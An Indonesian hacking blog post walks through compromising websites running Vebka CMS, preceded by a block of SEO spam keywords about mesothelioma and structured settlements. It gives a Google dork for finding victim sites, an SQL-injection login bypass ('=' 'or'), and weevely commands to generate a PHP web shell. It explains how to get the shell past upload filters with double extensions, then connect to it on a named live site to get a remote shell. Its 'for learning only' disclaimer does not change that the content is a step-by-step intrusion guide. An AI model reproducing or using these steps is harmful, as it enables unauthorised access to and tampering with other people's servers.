Keyword

http://addurl.nu mesothelioma survival rates,structured settlement annuity companies,mesothelioma attorneys california,structured settlements annuities,structured settlement buyer,mesothelioma suit,mesothelioma claim,small business administration sba,structured settlement purchasers,wisconsin mesothelioma attorney,houston tx auto insurance,mesotheliama,mesothelioma lawyer virginia,seattle mesothelioma lawyer,selling my structured settlement,mesothelioma attorney illinois,selling annuity,mesothelioma trial attorney,injury lawyer houston tx,baltimore mesothelioma attorneys,mesothelioma care,mesothelioma lawyer texas,structered settlement,houston motorcycle accident lawyer,p0135 honda civic 2004,structured settlement investments,mesothelioma lawyer dallas,caraccidentlawyer,structured settlemen,houston mesothelioma attorney,structured settlement sell,new york mesothelioma law firm,cash out structured settlement,mesothelioma lawyer chicago,lawsuit mesothelioma,truck accident attorney los angeles,asbestos exposure lawyers,mesothelioma cases,emergency response plan ppt,support.peachtree.com,structured settlement quote,semi truck accident lawyers,auto accident attorney Torrance,mesothelioma lawyer asbestos cancer lawsuit,mesothelioma lawyers san diego,asbestos mesothelioma lawsuit,buying structured settlements,mesothelioma attorney assistance,tennessee mesothelioma lawyer,earthlink business internet,meso lawyer,tucson car accident attorney,accident attorney orange county,mesothelioma litigation,mesothelioma settlements amounts,mesothelioma law firms,new mexico mesothelioma lawyer,accident attorneys orange county,mesothelioma lawsuit,personal injury accident lawyer,purchase structured settlements,firm law mesothelioma,car accident lawyers los angeles,mesothelioma attorneys,structured settlement company,auto accident lawyer san francisco,mesotheolima,los angeles motorcycle accident lawyer,mesothelioma attorney florida,broward county dui lawyer,state of california car insurance,selling a structured settlement,best accident attorneys,accident attorney san bernardino,mesothelioma ct,hughes net business,california motorcycle accident lawyer,mesothelioma help,washington mesothelioma attorney,best mesothelioma lawyers,diagnosed with mesothelioma,motorcycle accident attorney chicago,structured settlement need cash now,mesothelioma settlement amounts,motorcycle accident attorney sacramento,alcohol rehab center in florida,fast cash for house,car accident lawyer michigan,maritime lawyer houston,mesothelioma personal injury lawyers,personal injury attorney ocala fl,business voice mail service,california mesothelioma attorney,offshore accident lawyer,buy structured settlements,philadelphia mesothelioma lawyer,selling structured settlement,workplace accident attorney,illinois mesothelioma lawyer

Cara :: Hack Website dengan Weevely di Kali Linux 2.0 Sana

1/01/2016

 Mungkin sudah banyak para Master yang buat Tutorial Cara Hack Website dengan Weevely di Kali Linux 2.0 Sana, dan ini hanyalah pembelajaran semata, agar tau bagaimana sedikit kerentanan terhadap website maka akan fatal.. oke langsung aja 

ikuti Step by Step :

Step Pertama Tanam Backdoor
Step Kedua Eksekusi 

Step Pertama



sebelumnya banyak sekali cara atau teknik-teknik yang digunakan untuk menanam suatu backdoor atau shell, pada tutorial kali ini , kita menggunakan teknik VEBKA CMS SHELL UPLOAD ikuti step by stepnya
[Baca : Cara Setting IP Address agar menjadi static di Kali Linux 2.0 Sana}


+ Exploit Title : Vebka Cms shell upload
+ Exploit Author : Ashiyane Digital Security Team
+ Vendor Homepage : http://www[dot]vebka[dot]si/
+ Google Dork : "Urejanje strani" "Uporabniško ime" "/admin"
+ Date: 01 - 01 - 2016
+ Tested On : Kali Linux 2.0 Sana
+ Test Website : http://www[dot]klima-dolinar[dot]si/
|-| Halaman admin => /admin/
|-| username: '=' 'or'
|-| password: '=' 'or'
[Baca : Cara Menggunakan Proxychains di Kali LInux 2.0 [Sana]]
Masukkan dorknya -->  "Urejanje strani" "UporabniÅ¡ko ime" "/admin"  Ke "CLICK HERE"

maka akan muncul tab baru dengan tampilan seperti ini :


  
Pilih websitemya, dengan perhatikan link yang ditampilkan ,
(contoh : http://www[dot]klima-dolinar[dot]si )

buka lalu tambahkan Halaman Admin yang tertera di atas [ /admin/ ] dibelakang blognya, maka tampilannya akan seperti ini :

Masukkan Username dan Password diatas [ '=' 'or' ]

Syla 

bim

bim

:D



kalau gagal terus saat masukin username dan passwordnya, cari website lain ... :) cemungut yaa kakak :v

Selanjutnya cari dan cari untuk kita tanam backdoor nanti, kalau untuk teknik ini, saat buat postingan baru ada untuk upload file, upload image, upload video, upload lemari juga bisa :v hahahahaha ....

berikut penampakkannya :)

untuk coba-coba, upload file berformat jpg atau php dulu, apa aja terserah
[Baca :FIXED error Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory]
oke kita lanjut untuk buat backdoor dengan weevely ...

bagaimana cara membuat backdoor dengan weevely di kali linux 2.0 sana ? bagaimana cara menggunakan Weevely di Kali Linux 2.0 Sana ?

beginilah caranya ....

jeng

jeeng

jeeeenggg

wkwkwkwkwkwkw :v
Masukkan perintah berikut untuk melihat seluruh perintah di Weevely
[Baca : FIXED [!] ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/ ]
root@sarzafi:~# weevely -h

masukkan perintah berikut untuk membuat backdoor :

root@sarzafi:~# weevely generate password /root/admin.php

apabila backdoor berhasil dibuat maka akan ada pemberitahuan seperti ini 

[Baca : FIXED wine: ‘/home/namauser/.wine’ is a 64-bit installation, it cannot be used with a 32-bit wineserver]


Generated backdoor with password 'password' in '/root/admin.php' of 1449 byte size.


root@sarzafi:~# weevely generate password /root/admin.php


[Baca : Bahaya Virus CrypToWall]
generate : untuk membuat backdoor

password : isikan disini passwordnya, saya gunakan 'password' untuk password saya



/root/admin.php : Ini direktory atau lokasi backdoor ingin diletakkan dimana, sedangkan admin.php : adalah nama file backdoor yang dibuat


setelah backdoor dibuat, maka upload pada website yang kita telah dapat tadi, biasanya untuk file php akan di tolak, maka rename lah filenya

misalnya nama filenya admin.php ubah jadi admin.php.jpg , lalu coba upload, kalau masih tidak bisa juga ubah jadi admin.php.jpg.php.jPg atau admin.PhP.jpg atau admin.PhP.jPg ubahlah sampai file bisa diupload

[Baca:CARA :: MELAPORKAN SITUS PROVOKATIF , PORNOGRAFI, TINDAK KEKERASAN, DAN PELECEHAN SEKSUAL]

setelah diupload, maka akan muncul nama file yang kita buat tadi, klik kanan pada link yang muncul lalu pilih Edit Link , seperti ini :


 maka akan muncul seperti ini
[Baca : Aplikasi Android Mendapatkan Dollar dari Android (NO HOAX)]
copy link tersebut ... dan paste di notepad atau gedit atau leafpad ...
dan kita lanjut ke step berikutnya

[Baca : Cara Mendapatkan Uang dari Aplikasi Android]

Step Kedua Eksekusi



Buka weevely

root@sarzafi:~# weevely

masukan perintah berikut :

root@sarzafi:~# weevely [Link yang tadi di copy] [passwordnya]

contoh

root@sarzafi:~# weevely http://www[dot]klima-dolinar[dot]si/userfiles/admin[dot]php.jpg[dot]php.jPg password

[/ jangan ikutin [dot] nya, itu hanya contoh /]

apabila pada terminal muncul seperti ini :

weevely>

maka masukkan lagi passwordnya

jeng jeng jeng jeeeeng :D sekarang website berada di terminal anda, terserah mau di apain, asal jangan ditebas indexnya  :)

setelah masuk yang tadinya   

root@sarzafi:~# menjadi server1.vebka.si:/var/www/clients/client1/web49/web/userfiles $

masukkan perintah :

ls = untuk menampilkan

remove [nama file] = untuk menghapus file :D sisanya coba-coba aja ya :)

berikut penampakkannya

  untuk melihat Bantuan pada Weevely masukkan perintah :
:help
berikut tanda bagi [ : ]





Hapus Backdoor orang laen :D hahaha
demikianlah Cara Hack Website dengan Weevely di Kali Linux 2.0 Sana

TUTORIAL INI HANYALAH PEMBELAJARAN SEMATA, BUKAN UNTUK BANGGA BANGGAN ATAU SOMBONG-SOMBONGAN DI SOSMED ... SEKIAN DAN TERIMA KASEEEHHHHHHH

semoga bermanfaat

Bila Ingin Copas, Harap Sertakan Sumber ! Jika Ada Pertanyaan silahkan Inbok ke Kesini DMCA.com Protection Status
Bagikan ke Facebook Bagikan ke Twitter Bagikan ke WhatsApp Bagikan ke Google+